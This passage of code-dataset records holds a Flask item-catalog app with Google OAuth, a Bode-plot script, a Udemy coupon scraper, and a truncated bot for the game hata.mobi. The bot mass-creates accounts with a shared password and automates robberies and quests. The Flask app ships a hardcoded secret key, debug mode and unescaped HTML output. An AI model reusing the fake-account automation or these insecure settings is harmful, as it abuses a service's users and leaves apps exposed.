token info, abort.\n    if result.get('error') is not None:\n        response = make_response(json.dumps(result.get('error')), 500)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Verify that the access token is used for the intended user.\n    gplus_id = credentials.id_token['sub']\n    if result['user_id'] != gplus_id:\n        response = make_response(\n            json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Verify that the access token is valid for this app.\n    if result['issued_to'] != CLIENT_ID:\n        response = make_response(\n            json.dumps(\"Token's client ID does not match app's.\"), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    stored_access_token = login_session.get('access_token')\n    stored_gplus_id = login_session.get('gplus_id')\n    if stored_access_token is not None and gplus_id == stored_gplus_id:\n        response = make_response(json.dumps(\n            'Current user is already connected.'), 200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Store the access token in the session for later use.\n    login_session['access_token'] = access_token\n    login_session['gplus_id'] = gplus_id\n\n    # Get user info\n    userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n    params = {'access_token': access_token, 'alt': 'json'}\n    answer = requests.get(userinfo_url, params=params)\n\n    data = answer.json()\n\n    login_session['username'] = data['name']\n    login_session['picture'] = data['picture']\n    login_session['email'] = data['email']\n    login_session['provider'] = 'google'\n\n    # see if user exists, if it doesn't make a new one\n    user_id = getUserID(login_session[\"email\"])\n    if not user_id:\n        user_id = createUser(login_session)\n    login_session['user_id'] = user_id\n\n    output = ''\n    output += '<h1>Welcome, '\n    output += login_session['username']\n    output += '!</h1>'\n    output += '<img src=\"' + login_session['picture'] + '\"> '\n    flash(\"you are now logged in as %s\" % login_session['username'])\n    return output\n\n\n# User helper functions\ndef getUserID(email):\n    try:\n        user = session.query(User).filter_by(email=email).one()\n        return user.id\n    except Exception:\n        return None\n\n\ndef createUser(login_session):\n    newUser = User(name=login_session['username'],\n                   email=login_session['email'],\n                   picture=login_session['picture'])\n    session.add(newUser)\n    session.commit()\n    user = session.query(User).filter_by(email=login_session['email']).one()\n    return user.id\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n    access_token = login_session.get('access_token')\n    if access_token is None:\n        response = make_response(json.dumps('Current user not connected.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[0]\n    if result['status'] == '200':\n        for key in ('access_token', 'gplus_id', 'username',\n                    'email', 'picture', 'user_id'):\n            login_session.pop(key, None)\n\n\n@app.route('/')\n@app.route('/catalog')\ndef showCatalog():\n    \"\"\"Displays all catalogs by rendering catalog.html.\"\"\"\n\n    catalogs = session.query(Catalog).all()\n    return render_template('catalog.html', catalogs=catalogs)\n\n\n@app.route('/<int:catalog_id>/')\ndef showItems(catalog_id):\n    \"\"\"Displays catalog items by rendering items.html.\"\"\"\n\n    catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n    catalogs = session.query(Catalog).all()\n    items = session.query(CatalogItem).filter_by(catalog_id=catalog_id).all()\n    if 'username' not in login_session:\n        return render_template('publicitems.html', items=items,\n                               catalog=catalog, catalogs=catalogs)\n    else:\n        return render_template('items.html', items=items,\n                               catalog=catalog, catalogs=catalogs)\n\n\n\n@app.route('/<int:catalog_id>/<int:item_id>/')\ndef showDescription(catalog_id, item_id):\n    \"\"\"Displays item description by rendering description.html.\"\"\"\n\n    catalogs = session.query(Catalog).all()\n    catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n    item = session.query(CatalogItem).filter_by(id=item_id).all()\n    creator = session.query(CatalogItem).filter_by(id=item_id).one()\n    if 'username' not in login_session or creator.user_id != login_session['user_id']:\n        return render_template('publicdescription.html', catalog=catalog,\n                               item=item, catalogs=catalogs)\n    else:\n        return render_template('description.html', catalog=catalog,\n                               item=item, catalogs=catalogs)\n\n\n@app.route('/<int:catalog_id>/add', methods=['GET', 'POST'])\ndef addItem(catalog_id):\n    \"\"\"adds new items to the catalog.\"\"\"\n\n    if 'username' not in login_session:\n        return redirect('/login')\n    catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n    if request.method == 'POST':\n        if request.form['name'] == '':\n            return redirect(url_for('showItems', catalog_id=catalog_id))\n        else:\n            addItem = CatalogItem(item_name=request.form['name'],\n                description=request.form['description'], catalog_id=catalog_id,\n                user_id=login_session['user_id'])\n            session.add(addItem)\n            session.commit()\n            flash('New %s Item Successfully Added' % (addItem.item_name))\n            return redirect(url_for('showItems', catalog_id=catalog_id))\n    else:\n        return render_template('additem.html', catalog_id=catalog_id)\n\n\n@app.route('/<int:catalog_id>/<int:item_id>/edit', methods=['GET', 'POST'])\ndef editItem(catalog_id, item_id):\n    \"\"\"edits items in a catalog.\"\"\"\n\n    if 'username' not in login_session:\n        return redirect('/login')\n    catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n    editItem = session.query(CatalogItem).filter_by(id=item_id).one()\n    if login_session['user_id'] != editItem.user_id:\n        return \"\"\n\n    if request.method == 'POST':\n        if request.form['description']:\n            editItem.description = request.form['description']\n        if request.form['name']:\n            editItem.item_name = request.form['name']\n        session.add(editItem)\n        session.commit()\n        flash('Item successfully edited')\n        return redirect(url_for('showItems', catalog_id=catalog_id))\n    else:\n        return render_template('edititem.html', catalog_id=catalog_id,\n                               item=editItem)\n\n\n@app.route('/<int:catalog_id>/<int:item_id>/delete', methods=['GET', 'POST'])\ndef deleteItem(catalog_id, item_id):\n    \"\"\"delete item in a catalog.\"\"\"\n\n    if 'username' not in login_session:\n        return redirect('/login')\n    catalog = session.query(Catalog).filter_by(id=catalog_id).one()\n    deleteItem = session.query(CatalogItem).filter_by(id=item_id).one()\n    if login_session['user_id'] != deleteItem.user_id:\n        return \"\"\n\n    if request.method == 'POST':\n        session.delete(deleteItem)\n        session.commit()\n        return redirect(url_for('showItems', catalog_id=catalog_id))\n    else:\n        return render_template('deleteitem.html', catalog_id=catalog_id,\n                               item=deleteItem)\n\n# JSON APIs to provide catalog and items data\n\n\n
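# Example client calls for the JSON endpoints below (a sketch; the host and\n# port match the app.run() call at the bottom of this file):\n#   import requests\n#   catalog = requests.get('http://localhost:8000/catalog/JSON').json()\n#   items = requests.get('http://localhost:8000/catalog/1/items/JSON').json()\n@app.route('/catalog/JSON')\ndef showCatalogJSON():\n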
\"\"\"provides catalog data in JSON format.\"\"\"\n\n catalog = session.query(Catalog).all()\n return jsonify(catalog=[i.serialize for i in catalog])\n\n\n@app.route('/catalog/items/JSON')\ndef showItemsJSON():\n \"\"\"provides items data for all the catalogs in JSON format.\"\"\"\n\n items = session.query(CatalogItem).order_by(asc(CatalogItem.id)).all()\n return jsonify(items=[i.serialize for i in items])\n\n\n@app.route('/catalog//items/JSON')\ndef showCatalogItemsJSON(catalog_id):\n \"\"\"provides items for a particular catalog in JSON format.\"\"\"\n items = session.query(CatalogItem).filter_by(\n catalog_id=catalog_id).order_by(asc(CatalogItem.id)).all()\n return jsonify(items=[i.serialize for i in items])\n\n# Disconnect based on provider\n@app.route('/disconnect')\ndef disconnect():\n if 'provider' in login_session:\n if login_session['provider'] == 'google':\n gdisconnect()\n flash(\"You have successfully been logged out.\")\n return redirect(url_for('showCatalog'))\n else:\n flash(\"You were not logged in\")\n return redirect(url_for('showCatalog'))\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"shilpamadini/Item-Catalog","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":12566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42054890816","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport math\nfrom scipy.signal import lsim\n# Import the bellow Libraries if running on Termux\nimport subprocess\nimport shlex\n\n\npi = math.pi\n\np1 = 2*pi*1e6\np2 = 2*pi*1e7\np3 = 2*pi*1e8\npD = 2*pi*1e2\n\n\n# constants\na4 = 1\na3 = p1+p2+p3+pD\na2 = (p1*p2) +(p1*p3)+(p1*pD)+(p2*p3)+(p2*pD)+(p3*pD)\na1 = (p1*p2*p3)+(p1*p2*pD)+(p1*pD*p3)+(pD*p2*p3)\na0 = p1*p2*p3*pD\n\ng = 10**4\ns3 = signal.lti([g*p1*p2*p3,g*a0],[a4,a3,a2,a1,(g+1)*a0])\n\nf = 1e5 # enter the frequency\nt_s = 1/f\nt = np.linspace(0,25*t_s,5000)\nu = np.sin(2*pi*f*t)\nT,Y,X = lsim(s3,u,t)\n\nw3, mag3, phase3 = s3.bode()\nplt.semilogx(w3/(2*pi), mag3)\nx = np.array([1,10,100,1000,10000,1e5,1e6,1e7,1e8,1e9])\nplt.xticks(x)\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('$20\\log|T(f)|$')\nplt.grid()\nplt.savefig('../../figs/ee18btech11026/Bodeplot.eps')\nplt.savefig('../../figs/ee18btech11026/Bodeplot.pdf')\n#plt.show()\n\n\nplt.plot(T,Y)\nplt.title('f = '+str(f))\n\nplt.savefig('../../figs/ee18btech11026/sinusoid_res.eps')\nplt.savefig('../../figs/ee18btech11026/sinusoid_res.pdf')\n#plt.show()\n''' If using Termux '''\nsubprocess.run(shlex.split(\"termux-open ./figs/ee18btech11026/sinusoid_res.pdf\"))\nsubprocess.run(shlex.split(\"termux-open ./figs/ee18btech11026/Bodeplot.pdf\"))\n\n","repo_name":"Surya291/IITH_ACADEMIA","sub_path":"SEM_04/Control_2_2/Feedback_circuits/codes/ee18btech11026/time_res.py","file_name":"time_res.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38044845948","text":"from logging import getLogger\nimport time\n# local import\nfrom scrapper import util\n\nLOG = getLogger(__name__)\n\n\nasync def get(session, url=\"https://www.discudemy.com/all/1\") -> set:\n url_first_layer = set()\n url_second_layer = set()\n links_udemy = set()\n start = time.time()\n\n url_first_layer = await util.get_links(session, url, 'a', {'class': 'card-header'})\n\n url_second_layer = await 
util.get_links(session, url_first_layer, 'a', {'class': 'ui big inverted green button discBtn'}, limit=1)\n\n    links_udemy = await util.get_links(session, url_second_layer, 'a', {'id': 'couponLink'}, limit=1)\n\n    total_time = time.time() - start\n\n    LOG.debug(\"Took a total of {} second\".format(total_time))\n    # remove \"/\" before ?couponCode\n    # for link_udemy in links_udemy:\n    #     slash_index = link_udemy.find(\"?couponCode\")-1\n    #     if (link_udemy[slash_index] == \"/\"):\n    #         links_udemy.add(link_udemy[:slash_index] + link_udemy[slash_index+1:])\n\n    return links_udemy\n","repo_name":"feboss/scrapo","sub_path":"src/scrapo/scrapper/discudemy.py","file_name":"discudemy.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"27668375390","text":"#!/data/data/com.termux/files/usr/bin/env python3\n\nimport requests, random, time, lxml, html5lib, json, pytz\nfrom bs4 import BeautifulSoup as bs\nfrom datetime import datetime \n\nlistOfMuls = []\nlistOfAdjectives = [\n\t'spoilt ',\n\t'naughty ',\n\t'suspicious ',\n\t'frivolous ',\n\t'greedy',\n\t'deceitful ',\n\t'devious ',\n\t'sneaky ',\n\t'selfish ',\n\t'snobbish ',\n\t'arrogant',\n\t'aloof ',\n\t'eccentric ',\n\t'lazy ',\n\t'stubborn ',\n\t'rude ',\n\t'strict ',\n\t'sarcastic ',\n\t'cruel ',\n\t'evil ',\n\t'nosey ',\n\t'talkative ',\n\t'cunning',\n\t'tactless ',\n\t'touchy ',\n\t'ungrateful ',\n\t'grumpy ',\n\t'silly ',\n\t'forgetful ',\n\t'dull ',\n\t'aggressive ',\n\t'messy ',\n\t'hesitant ',\n\t'moody ',\n\t'bossy ',\n\t'clumsy ',\n\t'coward ',\n\t'careless ',\n\t'prejudiced ',\n\t'quirky ',\n\t'passive ',\n\t'timid ',\n\t'zany ',\n\t'stingy ',\n\t'obstinate',\n\t'vulgar',\n\t'coarse',\n\t'foolish',\n\t'boring',\n\t'impudent',\n\t'obnoxious',\n\t'daring',\n\t]\nfor x in listOfAdjectives:\n\tlistOfMuls.append('Ork'+str(x).strip().capitalize())\n\n\n\n# Create the user session\nuser = requests.Session()\n# The user's browser (user-agent string)\nuserAgent = 'Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101'\npassForMults = '7shokpar7'\nnewMult = ''\nmyLevel = 0\nmyDots = []\nurl_take_card = ''\ncurrentFightsCount = 0\ngoodRobsCount = 0\ngand_id_for_request = 11691\nuser.headers = {\n\t 'user-agent': userAgent\n\t}\nisAllowedToBuyEnergy = True\n\n# Links\nurl = 'https://hata.mobi'\nrandomAttackUrl = url + '/index.php?r=crop/attackRandom'\nurlToLight = url + '/index.php?r=site/layout&layout=light'\nurlToDefault = url + '/index.php?r=site/layout&layout=default'\nurlProfile = url + '/index.php?r=profile'\nurlQuests = url + '/index.php?r=quests'\nurlToHarvestAll = url + '/index.php?r=crop/harvest&id=all'\nurlToCheckCropsByPage = url + '/index.php?r=crop/index&info=open&page='\nurlToExchange = url + '/index.php?r=harvest/exchange'\n\n# Links for the crop points\nurlToOpen = url + '/index.php?r=crop/view&id='\nurlToRemove = url + '/index.php?r=crop/remove&id='\nurlToBoost = url + '/index.php?r=crop/boost&id='\nurlToAdd = url + '/index.php?r=crop/add&id={0}&user_crop_id={1}'\nurlToHarv = url + '/index.php?r=crop/harvest&id='\n\n# The crop points we need (names must match the site, so they stay in Russian)\nneedCrops = [\n\t'Магазин электроники \"Синус\"',\n\t'Мясная лавка \"Гаф-Гафыч\"',\n\t'#Казино \"Royal\"',\n\t'#Супермаркет \"Пуля\"',\n\t'#Ресторан \"Бульвар\"',\n\t'#Солярий \"Шоколадка\"'\n]\n\n\nsongLines = [\n\t'Не позволяйте траве расти на пути дружбы. (Сократ)', \n\t'Короли или правители - это не те, кто носит скипетр, а те, кто знает, как командовать. (Сократ)',\n\t]\n\n
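# Site-facing string: it mirrors the (Russian) message rendered by hata.mobi,\n# so it is deliberately left untranslated.\nLOST_CROP_NOTIFICATION = 'Эту точку уже кто-то обнес, дружище. 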
Выбери другую.'\n\ncurrentVictimBoxes = 0\ncurrentVictimRelationsCops = 0\ncurrentVictimRelationsBandits = 0\n\n\ndef login(userLogin,password):\n\t\"\"\"\n\tLog in with the given credentials.\n\t\"\"\"\n\t\n\t\n\tloginData = {\n\t    'login': userLogin,\n\t\t'password': password\n\t}\n\t\n\t# Submit the auth form with the credentials entered above\n\tuser.post(url + '/index.php?r=site/auth/', data=loginData)\n\tprint('Авторизованы под ником ', userLogin)\n\twaitHalfSecond()\n\ndef writeToFile(nick):\n\twith open('combinat_result_temp.txt', 'a', encoding=\"utf8\") as mf:\n\t\tmf.write(str(nick)+'\\n')\n\tpass\n\n\ndef waitHalfSecond():\n\t#time.sleep(0.45)\n\tpass\n\n\ndef getSoup(url):\n\twaitHalfSecond()\n\tpage = user.get(url)\n\tsoup = bs(page.content, \"lxml\")\n\treturn soup\n\ndef gotoband():\n\tuser.get(url + '/index.php?r=gangBase/request&id='+str(gand_id_for_request))\n\twaitHalfSecond()\n\tuser.get(url + '/index.php?r=gangBase/request&id='+str(gand_id_for_request))\n\tprintWithLevel('заявка')\n\ndef setFunnyDescription():\n\trandomDate = random.randint(1,27)\n\tif randomDate<10:\n\t\trandomDate = '0'+str(randomDate)\n\trandomMonth = random.randint(1,11)\n\tif randomMonth<10:\n\t\trandomMonth = '0'+str(randomMonth)\n\trandomYear = random.randint(1980,1999)\n\trandomIndex = random.randint(0,len(songLines)-1)\n\tfunnyDescription = songLines[randomIndex]\n\tuser.post(urlProfile+'/edit', data = {\n\t\t\t\t'Profile[name]': 'Орыч',\n\t\t\t\t'Profile[city]': '',\n\t\t\t\t'Profile[info]': '',\n\t\t\t\t'Profile[phone]': '',\n\t\t\t\t'Profile[email]': '',\n\t\t\t\t'Profile[subscribed]': '0',\n\t\t\t\t'Profile[subscribed]': '1',\n\t\t\t\t'yt0': 'Сохранить',\n\t\t\t\t'Profile[birthday]': str(randomDate),\n\t\t\t\t'Profile[birthmonth]': str(randomMonth),\n\t\t\t\t'Profile[birthyear]': str(randomYear),\n\t\t\t\t'Profile[phone_code]': '7'})\n\tprintWithLevel('Поставили описание: '+str(funnyDescription))\n\twaitHalfSecond()\n\n\n\n\t\n\ndef harvestAll():\n\tuser.get(urlToHarvestAll)\n\tprint('[{0}] Сбор всех точек.'.format(myLevel))\n\n\ndef removeDot(id_c):\n\tuser.post(urlToRemove+str(id_c),data = {'confirm':'Базарю'})\n\tprint('Удалил точку')\n\twaitHalfSecond()\n\ndef boostDot(id_c):\n\tuser.post(urlToBoost+str(id_c),data = {'confirm':'Базарю'})\n\tprint('Ускорил точку')\n\twaitHalfSecond()\n\ndef changeLayoutToLight():\n\tuser.get(urlToLight)\n\tprint('[Процесс] Ставим облегченный режим.')\n\ndef changeLayoutToDefault():\n\tuser.get(urlToDefault)\n\tprint('[Процесс] Ставим полный режим.')\n\ndef getAwards(x=5):\n\tchangeLayoutToLight()\n\tprint('[{0}] Проверка награды'.format(myLevel))\n\tfor i in range(x):\n\t\twaitHalfSecond()\n\t\ttry:\n\t\t\topenQuestsSoup = getSoup(urlQuests)\n\t\t\taw_url = openQuestsSoup.find('a', attrs = {'class':'bttn_green'})['href']\n\t\t\tprint('[{0}] Перейдем по ссылке: {1}'.format(myLevel, aw_url))\n\t\t\tuser.get(url+aw_url)\n\t\texcept Exception as e:\n\t\t\tpass\n\t\t\t# print('[Ошибка] Не удалось перейти по ссылке', e)\n\t\twaitHalfSecond()\n\n\ndef printWithLevel(text):\n\tprint('[{0}] {1}'.format(myLevel,text))\n\n\ndef upgrade_stats():\n\tuser.get(url + '/index.php?r=fights/params&param_id=strength')\n\tprintWithLevel('Улучшили силу')\n\t#time.sleep(2)\n\tpass\n\ndef checkLevel():\n\tglobal myLevel\n\tdocent = 0\n\tchangeLayoutToLight()\n\tsoup = getSoup(urlProfile)\n\ttry:\n\t\tmyLevel = int(soup.find('span',id='z-level').find(\"span\").get_text())\n\t\tprint('Мой уровень: ',myLevel)\n\texcept:\n\t\tprint('[Ошибка] Не получил данные о уровне')\n\ndef 
newAccount(mulLog):\n\tglobal user, newMult\n\ttry:\n\t\tuser.close()\n\texcept:\n\t\tprint('Нет сессий.')\n\tuser = requests.Session()\n\ttutorialLinks = [\n\t\turl + '/index.php?r=site/index&no_cookies=1&reason=',\n\t\turl + '/index.php?r=tutorial/alternative/view&new=1',\n\t\turl + '/index.php?r=site/layout&layout=light',\n\t\turl + '/index.php?r=tutorial/alternative/finish',\n\t\turl + '/index.php?r=site/signUpPost']\n\tfor idx, link in enumerate(tutorialLinks):\n\t\tuser.get(link)\n\t\tprint('[Туториал] Шаг {0} из {1}'.format(idx,len(tutorialLinks)))\n\t\twaitHalfSecond()\n\t\n\t\n\tuser.post(url + '/index.php?r=site/signUpPost', data = {'login': str(mulLog), 'password': passForMults,'phoneOrMail':''})\n\twriteToFile(mulLog)\n\tprint('[Туториал] Создали персонажа: ', mulLog)\n\tnewMult = str(mulLog)\n\tcheckLevel()\n\ndef addDot(type_id,id_c):\n\tuser.get(urlToAdd.format(type_id,id_c))\n\tprintWithLevel('Поставили: '+str(type_id))\n\twaitHalfSecond()\n\ndef harvDot(id_c):\n\tuser.get(urlToHarv+str(id_c))\n\tprintWithLevel('Запрос на сбор точки: '+str(id_c))\n\twaitHalfSecond()\n\ndef getDotsId(page=0):\n\tglobal myDots\n\tmyDots = []\n\tchangeLayoutToLight()\n\twaitHalfSecond()\n\tgetCrops = getSoup(urlToCheckCropsByPage+str(page))\n\tdot_divs = getCrops.find_all('div', attrs = {'class':'dots-item'})\n\tfor dot in dot_divs:\n\t\ttry:\n\t\t\turl_corp = str(dot.find('a').get('href'))\n\t\t\tif len(url_corp) == 25:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tx = url_corp.split(\"id=\")\n\t\t\t\tif len(x[1])>13:\n\t\t\t\t\tx2 = x[1]\n\t\t\t\t\tx3=x2.split(\"&\")\n\t\t\t\t\t#print(x3)\n\t\t\t\t\tcorp_x = x3[0]\n\t\t\t\t\tmyDots.append(corp_x)\n\t\t\t\telse:\n\t\t\t\t\tcorp_x = x[1]\n\t\t\t\t\tmyDots.append(corp_x)\n\t\t\t\t\n\t\t\t\t\n\t\texcept Exception as e:\n\t\t\tpass\n\t\t\t# print('[Ошибка] Не удалось получить данные о точке: ', e)\ndef harvestAllEachOne():\n\tprintWithLevel('Соберем точки каждого по индивидуальному клику.')\n\tgetDotsId()\n\tfor id_c in myDots:\n\t\tharvDot(id_c)\n\t\twaitHalfSecond()\n\tuser.get(urlToExchange)\n\ndef printStartMission(level):\n\tprint('[Выполнение миссий] Уровень {0}, фактический: {1}'.format(str(level), myLevel))\n\n\ndef robs(count):\n\t\t\n\tdef getPageCountAndVictimId(soup):\n\t\tpager = soup.find('div', attrs={'class': 'pager'})\n\t\tif pager == None:\n\t\t\tprint('У жертвы нет больше 1-ой страницы, по этому 777')\n\t\t\twaitHalfSecond()\n\t\t\treturn 777, 1\n\t\telse:\n\t\t\tlastPage = pager.find('li', attrs={'class': 'last'})\n\t\t\tif lastPage:\n\t\t\t\tlastCropsUrl = lastPage.find('a')['href']\n\t\t\t\trawUrl = lastCropsUrl.split('&')\n\t\t\t\tvictimId = int(rawUrl[1].split('id=')[1])\n\t\t\t\tpageCount = int(rawUrl[2].split('page=')[1])\n\t\t\t\tprint('ID жертвы', victimId)\n\t\t\t\tprint('Количество страниц', pageCount)\n\t\t\t\treturn victimId, pageCount\n\n\t\t\telse:\n\t\t\t\tprint('У жертвы нет больше 1-ой страницы')\n\t\t\t\treturn 777, 1\n\n\n\n\tdef getSortedCrops(cropContainer):\n\t\tsortedCrops = []\n\t\tfor crop in cropContainer:\n\t\t\tripe = crop.find('img', attrs={'alt': 'прибыль'})\n\t\t\tif ripe:\n\t\t\t\t# Подойдет\n\t\t\t\tsortedCrops.append(crop)\n\n\t\tprint('Можно ограбить: ', len(sortedCrops))\n\t\treturn sortedCrops\n\n\tdef findTheNeedCrop(sortedCrops):\n\t\tfoundCrops = []\n\t\tfor crop in sortedCrops:\n\t\t\t# imgContainer = crop.findAll('img')\n\t\t\t# cropName = imgContainer[1]['alt'].strip()\n\t\t\t# if cropName in needCrops:\n\t\t\t# \t# print(cropName, ' нам нужен!')\n\t\t\tfoundCrops.append(crop)\n\t\t\t# 
else:\n\t\t\t# \t# print(cropName, ' нам не нужен!')\n\t\t\t# \tpass\n\t\tprint('Точки которые мы ищем: ', len(foundCrops), ' шт.')\n\t\treturn foundCrops\n\n\tdef getlinksToRob(foundCrops):\n\t\tharvestLinks = []\n\t\tfor crop in foundCrops:\n\t\t\tharvestLink = crop.find('a')['href']\n\t\t\tharvestLinks.append(harvestLink)\n\t\treturn harvestLinks\n\n\t\tpass\n\n\tdef getAvailableCrops(robSoup):\n\t\t# pages = range(1,pageCount+1)\n\t\tallCrops = []\n\t\t# for page in pages:\n\t\t# \twaitHalfSecond()\n\t\t# \tpageUrl = url + '/index.php?r=crop/index&id={0}&page={1}'.format(victimId,page)\n\t\t# \tcrops = getSoup(pageUrl)\n\t\t# \tif crops:\n\t\tcropContainer = robSoup.findAll('div', attrs={'class': 'field_empty'})\n\t\tif cropContainer:\n\t\t\tallCrops = allCrops + cropContainer\n\t\tprint('Не отсортированные точки:', len(allCrops))\n\t\tsortedCrops = getSortedCrops(allCrops)\n\t\tfoundCrops = findTheNeedCrop(sortedCrops)\n\t\tif len(foundCrops) != 0:\n\t\t\tlinksToRob = getlinksToRob(foundCrops)\n\t\t\trobByLinks(linksToRob)\n\t\telse:\n\t\t\tprint('Нет доступных точек')\n\t\t\treturn 0\n\t\tprint('С этим закончили!')\n\t\treturn 1\n\n\n\n\n\n\tdef getNotificationText(robSoup):\n\t\tnotification = robSoup.find('div', attrs={'class': 'notification'})\n\t\tif notification:\n\t\t\ttext = notification.get_text().strip()\n\t\t\tif text:\n\t\t\t\treturn text\n\t\t\telse:\n\t\t\t\treturn None\n\n\n\tdef getNotificationFull(robSoup):\n\t\tnotification = robSoup.find('div', attrs={'class': 'notification'})\n\t\tif notification:\n\t\t\treturn notification\n\t\telse:\n\t\t\treturn None\n\n\n\tdef closeNotification():\n\t\turlToCloseNotification = url + '/index.php?r=user/notice'\n\t\turlToCloseElection = url + '/index.php?r=election'\n\t\tuser.get(urlToCloseNotification)\n\t\tuser.get(urlToCloseElection)\n\t\tprint('Закрыли уведомление.')\n\t\twaitHalfSecond()\n\n\n\tdef addToRewards(boxCount, relationCount, rewardType):\n\t\tglobal currentVictimBoxes, currentVictimRelationsCops, currentVictimRelationsBandits\n\t\tcurrentVictimBoxes = currentVictimBoxes + boxCount\n\n\t\tif rewardType == 'bandits':\n\t\t\tcurrentVictimRelationsBandits = currentVictimRelationsBandits + relationCount\n\t\telif rewardType == 'cops':\n\t\t\tcurrentVictimRelationsCops = currentVictimRelationsCops + relationCount\n\t\telse:\n\t\t\tprint(rewardType)\n\n\n\tdef cleanCurrentRewars():\n\t\tglobal currentVictimBoxes, currentVictimRelationsCops, currentVictimRelationsBandits\n\t\tcurrentVictimBoxes = 0\n\t\tcurrentVictimRelationsCops = 0\n\t\tcurrentVictimRelationsBandits = 0\n\n\n\n\tdef determineRewardType(notify):\n\t\tbanditsImg = 'https://static.hata.mobi/i/relations/Reshetka.png'\n\t\tcopsImg = 'https://static.hata.mobi/i/relations/Furazhka.png'\n\t\tcap = notify.find('img', attrs={'src': copsImg})\n\t\tlattice = notify.find('img', attrs={'src': banditsImg})\n\t\tif lattice != None:\n\t\t\tfindOutReward(notify,'bandits')\t\n\t\telif cap != None:\n\t\t\tfindOutReward(notify,'cops')\n\t\telse:\n\t\t\t# print('cap: ',cap, 'lattice: ',lattice)\n\t\t\tfindOutReward(notify,'only-crops')\n\t\t\t\n\n\n\tdef findOutReward(notify, rewardType):\n\t\tsplitedText = notify.get_text().strip().split(' ')\n\t\tboxCount = int(splitedText[-4])\n\t\trelationCount = int(splitedText[-1].split('.')[0])\n\t\taddToRewards(boxCount, relationCount, rewardType)\n\n\n\tdef getRobResult(text):\n\t\tsplitedText = text.split(' ')\n\t\tif splitedText[0] == 'Стопе!':\n\t\t\tprint(text.strip())\n\t\t\treturn 'stop'\n\t\telif splitedText[0] == 
'Красава!':\n\t\t\treturn 'next'\t\n\t\telif splitedText[0] == 'Нифига':\n\t\t\treturn 'next'\t\t\n\t\telif splitedText[0] == 'Ты':\n\t\t\tprint(splitedText)\n\t\t\treturn 'next'\n\t\telif splitedText[0] == 'Братан,':\n\t\t\treturn 'energy'\t\n\t\telif splitedText[0] == 'Эту':\n\t\t\treturn 'collected'\t\n\t\telif splitedText[0] == 'Мусорская':\n\t\t\tcloseNotification()\n\t\t\treturn 'notification'\n\t\telse:\n\t\t\tcloseNotification()\n\t\t\treturn 'notification'\n\t\t\n\n\tdef one_rob(link):\n\t\twaitHalfSecond()\n\t\trobUrl = url + link\n\t\trobSoup = getSoup(robUrl)\n\t\ttext = getNotificationText(robSoup)\n\t\tif text:\n\t\t\tresult = getRobResult(text)\n\t\t\tif result == 'next':\n\t\t\t\tnotify = getNotificationFull(robSoup)\n\t\t\t\t# determineRewardType(notify)\n\t\t\treturn result\n\t\telse:\n\t\t\tprint('Нет текста')\n\t\t\t# print(robSoup)\n\t\t\treturn robSoup\n\t\t\t\t\n\n\tdef buyEnergyRob():\n\t\t# urlToBuyEnergy = url + '/index.php?r=crop/energyRepair'\n\t\t# user.get(urlToBuyEnergy)\n\t\tprint('Нет энергии, ждем 30 сек и продолжим')\n\t\t#time.sleep(30)\n\n\tdef tryToRob(link):\n\t\tglobal goodRobsCount\n\t\tresultOfRob = one_rob(link)\n\t\tif resultOfRob == 'next':\n\t\t\trandInt = random.randint(1, 9)\n\t\t\tprint('Ограбили [{0}/{1}]'.format(goodRobsCount, count))\n\t\t\tgoodRobsCount = goodRobsCount + 1\n\t\t\tif goodRobsCount >= count:\n\t\t\t\treturn 'enough'\n\t\t\twaitHalfSecond()\n\t\t\treturn tryToRob(link)\n\t\telif resultOfRob == 'energy':\n\t\t\tbuyEnergyRob()\n\t\t\twaitHalfSecond()\n\t\t\treturn tryToRob(link)\n\t\telif resultOfRob == 'stop':\n\t\t\treturn 'break'\t\n\t\telif resultOfRob == 'collected':\n\t\t\tprint('Уже собрали')\n\t\t\twaitHalfSecond()\n\t\t\treturn 'good'\n\t\telif resultOfRob == 'notification':\n\t\t\tprint('Уведомление какое то другое, закрыли')\n\t\t\twaitHalfSecond()\n\t\t\treturn tryToRob(link)\n\t\telse:\n\t\t\trandInt2 = random.randint(1, 3)\n\t\t\tprint('Харе так бешанно кликать! Ждем {0} секунд'.format(randInt2))\n\t\t\t#time.sleep(randInt2)\n\t\t\treturn tryToRob(link)\n\n\tdef robByLinks(linksToRob):\n\t\tprint('Количество ссылок: ', len(linksToRob))\n\t\tfor link in linksToRob:\n\t\t\tprint('У нас ссылка есть: ', link)\n\t\t\tresult = tryToRob(link)\n\t\t\tif result == 'break':\n\t\t\t\tprint('Похоже тут охрана')\n\t\t\t\tbreak\n\t\t\telif result == 'good':\n\t\t\t\tpass\n\t\t\telif result == 'enough':\n\t\t\t\tprint('А мы все!')\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tprint('Не понятная аномалия')\n\t\t\t\tprint(result)\n\t\t\t\t#time.sleep(1)\n\n\tdef getCurrentTime():\n\t\ttzAlmaty = pytz.timezone('Asia/Almaty') \n\t\tdatetimeAlmaty = 